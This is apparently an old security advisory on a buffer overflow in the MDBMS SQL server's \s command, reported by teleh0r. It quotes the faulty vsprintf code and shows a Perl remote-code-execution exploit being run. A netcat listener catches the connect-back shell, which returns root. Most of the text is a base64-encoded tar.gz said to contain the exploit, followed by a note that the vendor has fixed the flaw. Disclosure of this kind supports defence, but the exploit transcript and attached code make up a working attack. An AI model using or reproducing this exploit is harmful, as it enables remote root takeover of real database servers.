COMMAND

    MDBMS

SYSTEMS AFFECTED

    MDBMS 0.99b9 and below

PROBLEM

    teleh0r  found  following.   MDBMS   is  a  SQL  database   server
    (currently) for UNIX systems.   Version 0.99b9 and below  versions
    contain an exploitable buffer overflow  in the handling of the  \s
    console command.

    When a  user passes  large buffers  to the  server in  the form of
    multiple lines, these are  appended to the end  of each other.   A
    subsequent call to the \s command causes the overflow.

    Below is faulty code (from interface.cc):

       void user::uprintf(char *s, ...)
       {
         char b[10000];
         int len=strlen(outbuf), newlen;
         va_list ap;
         va_start(ap,s);
         vsprintf(b,s,ap); <----
         va_end(ap);
         newlen=strlen(b);
         while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
         strcat(outbuf,b);
         FD_SET(fd,&parent->wmask);
       }

    Exploit example:

       [teleh0r@localhost mdbms]$ ./mdbms-pms.pl
       
       -- Remote code execution exploit - MDBMS <= 0.99b
       -- <teleh0r@digit-labs.org> - Copyright (c) 2001
       
       Usage: ./mdbms-pms.pl -t <hostname> -b <back>
       
            -t <hostname>    : hostname to test
            -b <back>        : connect back to ip
            -p <port>        : port (default: 2223)
            -d <delay>       : delay before timeout
            -o <offset>      : offset
            -h               : return to heap
       
       [teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
       [1] 2070
       listening on [any] 1337 ...
       
       [teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
       
       -- Remote code execution exploit - MDBMS <= 0.99b
       -- <teleh0r@digit-labs.org> - Copyright (c) 2001
       
       -> Connected to: 127.1 / MDBMS V0.99b9 ready.
       -> Address : 0x302027d / xor-mask: 0x2020202
       -> Return  : 0x80cfe76 / using the heap ...
       -> Sending payload: ...
       
       -> * Successfully sent payload - good luck!
       
       connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
       [teleh0r@localhost mdbms]$ %
       nc -l -v -p 1337
       whoami; uname -mnrsp
       root
       Linux localhost.localdomain 2.4.2-2 i686 unknown
       ...

    Exploit code attached (MIMED):

    ---
    Content-Type: application/octet-stream; name="mdbms.tar.gz"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="mdbms.tar.gz"
    Content-MD5: x0xnO/SGP+RgmnELFfaHzw==
    
    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
    
    -----

SOLUTION

    mu-b also found a buffer overflow in the "create database" system.
    This was actually caused by  a sprintf that generated the  name of
    the management  variable.   This has  been fixed  - now  table and
    database names can no longer be larger than 128 bytes.

    Information about  the overflows  was sent  to marty@hinttech.com.
    He  has  now  fixed  the  problems,  and new versions of MDBMS can
    be found at:

        http://www.hinttech.com/mdbms/